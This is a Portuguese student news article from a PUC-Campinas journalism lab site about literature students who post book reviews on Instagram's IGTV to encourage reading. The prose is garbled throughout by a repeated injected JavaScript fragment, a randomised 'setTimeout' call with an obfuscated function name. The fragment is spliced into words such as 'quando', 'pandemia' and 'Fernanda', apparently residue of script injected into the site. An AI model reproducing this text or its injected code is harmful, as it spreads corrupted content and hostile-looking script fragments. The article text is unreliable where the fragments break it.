Destaque

Alunos de letras incentivam a leitura no Instagram

Para atrair jovens, diretório acadêmico do curso da PUC aposta em resenhas no IGTV 

 

 

Por: Beatriz Borghini

Com as aulas acontecendo de maneira remota, os eventos organizados pelos estudantes nas universidades diminuíram. Por esse motivo, o diretório acadêmico do curso de letras da PUC de Campinas teve a ideia de movimentar as redes sociais, especialmente o Instagram, com projetos desenvolvidos em conjunto pelos alunos. Foi o caso da iniciativa Resenhadores: uma série de vídeos no IGTV, canal de vídeos do Instagram, em que os estudantes resenham livros.

Natália Nogueira, 21, aluna de letras e coordenadora-adjunta da chapa Práxis, que comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda o diretório, diz que a ideia foi se dedicar a obras que não são obrigatórias para o curso: “Fizemos um combinado, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando estávamos pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nesse projeto, de resenharmos livros de que gostamos e lemos fora da faculdade”.

“A ideia era resenhar livros de que gostamos, além da faculdade”, conta Natália Nogueira (Foto: Acervo pessoal)

A aluna ainda conta que a ideia é resenhar livros que sejam acessíveis, para incentivar a leitura. “O brasileiro não tem esse hábito. Por isso, os livros infantojuvenis, por exemplo, incentivam as pessoas a lerem”, diz. Essa também é a opinião de Caroline Gomes, 23, que é coordenadora-geral da chapa. Para elas, os livros juvenis, sobretudo os que são em série, devem ser igualmente valorizados, pois é por meio deles que os jovens são cativados e incentivados a ler. “Ninguém começa lendo Machado de Assis e amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de primeira. Gostar de ler é um processo que começa na infância e se estende até a vida adulta”, diz.

Natália diz que a iniciativa foi de Milena Neriz, coordenadora financeira do diretório, mas também destaca que todos os alunos da chapa auxiliaram em alguma etapa do projeto. A ideia de postar os vídeos, por exemplo, foi da estudante Beatriz Marques: “Ela é nossa coordenadora de mídias, que entende de tecnologia e contou para a chapa que achava mais interessante os membros aparecerem nas redes, para que o público se identificasse com eles”, destaca. A equipe ainda é formada por Francesca Gomez, Ingrid Nascimento, Wynicius dos Santos, Maria Eduarda Freitas e Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Akimoto.

 

Leia mais:

Escritas por fãs, fanfics ainda são alvo de preconceito

Clubes de leitura aproximam pessoas durante a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia

 

Importância para a formação

João Paulo Hergesel, 28, professor da Faculdade de Letras da PUC de Campinas, afirma que os estudantes são bem livres na ação e que desenvolvem todo o conteúdo do projeto.  O papel dos docentes é acompanhar as publicações e darem dicas: “Os próprios alunos escolhem os livros que serão resenhados com base em suas experiências e preferências”.

“Gostar de ler é um processo”, afirma Caroline Gomes (Foto: Acervo Pessoal)

O professor ainda acredita que é importante para o aprendizado dos alunos na graduação produzir conteúdo para o Instagram, para que possam reforçar suas leituras e reflexões: ”Acredito que já nos convencemos de que a educação não se faz apenas com lousa e cadernos, mas com o diálogo, a prática, a movimentação dos estudos autônomos e o compartilhamento daquilo que se aprendeu. As mídias podem ser um recurso didático de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande potencial”.

Caroline Gomes destaca também que a chapa realizou uma série de lives com os professores e um outro projeto chamado English Tips, em que os alunos falam sobre dicas de leitura e vocabulário em inglês. Quanto ao possível próximo livro resenhado, ela preferiu manter segredo: “Não vou dizer qual livro, porque em breve estará no Instagram, mas já aviso que vou apostar em crônicas”.

 

Orientação: Profa. Juliana Doretto

Edição: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Almeida


Veja mais matéria sobre Destaque

Parceria entre CACI e Aliança Francesa Celebra o Cinema de Jean-Luc Godard


CACI e Aliança Francesa promovem mostra de obras clássicas de Jean-Luc Godard na PUC-Campinas, reforçando o papel da cultura na formação acadêmica


Diagnóstico precoce de câncer ainda enfrenta desafios no Brasil


Senso comum sobre a doença e medo podem influenciar o estágio do tratamento, apesar da melhora no acesso à informação


“Se é Fake não é News” premia estudantes de jornalismo 


Em parceria com o Grupo EP, alunos fizeram produções com a temática das eleições municipais 


A outra face da Reciclagem: catadores e suas lutas diárias


Pesquisa aponta que 70% dos profissionais autônomos de materiais recicláveis vivem com menos de R$1.100,00 mensais e não possuem benefícios sociais


Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.